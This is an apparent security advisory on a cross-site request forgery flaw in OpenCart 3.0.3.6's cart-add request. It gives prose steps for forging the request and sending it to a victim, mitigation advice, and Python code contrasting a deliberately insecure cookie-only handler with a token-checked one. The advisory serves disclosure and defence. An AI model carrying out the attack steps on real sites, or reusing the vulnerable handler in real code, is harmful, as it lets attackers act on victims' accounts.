Vendor: OpenCart CMS
By: Mahendra Purbia {Mah3Sec}
CVSS: 8.8 (HIGH)
CWE: 352 (Cross Site Request Forgery)
Product Name: OpenCart CMS
Affected Version From: 3.0.3.6
Affected Version To: 3.0.3.6
Patch Exists: NO
Related CWE: N/A
CPE: a:opencart:opencart:3.0.3.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020
OpenCart 3.0.3.6 – Cross Site Request Forgery
The product lets a user add another user's wish-list to his or her own cart: user A can add products to a wish-list and make that wish-list public so that other users can see it. The cart-add request is accepted on the strength of the session cookie alone, with no per-request token, so it can be forged from a third-party page.

Attack Vector:
1. Create two accounts, A (attacker) and B (victim).
2. Log in as A, add a product to the cart, and capture that request in Burp Suite.
3. Change the quantity if desired, then create a CSRF PoC of that request.
4. Save it as .html and send it to the victim. The product is then added to the victim's cart.
Mitigation:
Implementing a CSRF token in the application, validating the Referer header, and using a CAPTCHA are some of the ways to mitigate CSRF attacks. Of these, a per-session synchronizer token checked on every state-changing request is the primary fix; Referer checks and CAPTCHAs are defence in depth, since the Referer header may be stripped and a CAPTCHA on every cart action is impractical.
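The synchronizer-token fix, as an added illustration that is not OpenCart's code: a constructed cart-add handler in the cookie-only form the advisory describes, beside a hardened form that requires a token bound to the session. Field names (product_id, quantity, csrf_token) and the session store are assumptions.

```python
import hmac
import secrets


def new_session_store() -> dict:
    """Constructed server-side session store: cookie value -> session state."""
    return {"cookie-for-user-b": {"user": "B", "cart": {}}}


def issue_csrf_token(session: dict) -> str:
    """Token generated once per session and embedded only in the site's own forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def _add_to_cart(session: dict, form: dict) -> tuple[int, str]:
    """Shared cart logic; rejects malformed product ids and non-positive quantities."""
    product_id = form.get("product_id", "")
    try:
        quantity = int(form.get("quantity", "1"))
    except ValueError:
        return 400, "bad product or quantity"
    if not product_id.isdigit() or quantity < 1:
        return 400, "bad product or quantity"
    cart = session["cart"]
    cart[product_id] = cart.get(product_id, 0) + quantity
    return 200, "added"


def cart_add_vulnerable(sessions: dict, cookie: str, form: dict) -> tuple[int, str]:
    """Honours any POST that carries a valid session cookie (the advisory's behaviour).
    The browser attaches the cookie to a cross-site form submission, so a page the
    victim opens elsewhere can drive this handler."""
    session = sessions.get(cookie)
    if session is None:
        return 401, "not logged in"
    return _add_to_cart(session, form)


def cart_add_hardened(sessions: dict, cookie: str, form: dict) -> tuple[int, str]:
    """Same handler with a synchronizer-token check; fails closed when no token exists."""
    session = sessions.get(cookie)
    if session is None:
        return 401, "not logged in"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # A third-party page cannot read the victim's token (same-origin policy), so a
    # forged form arrives without it. compare_digest avoids a timing side channel.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "csrf token missing or invalid"
    return _add_to_cart(session, form)
```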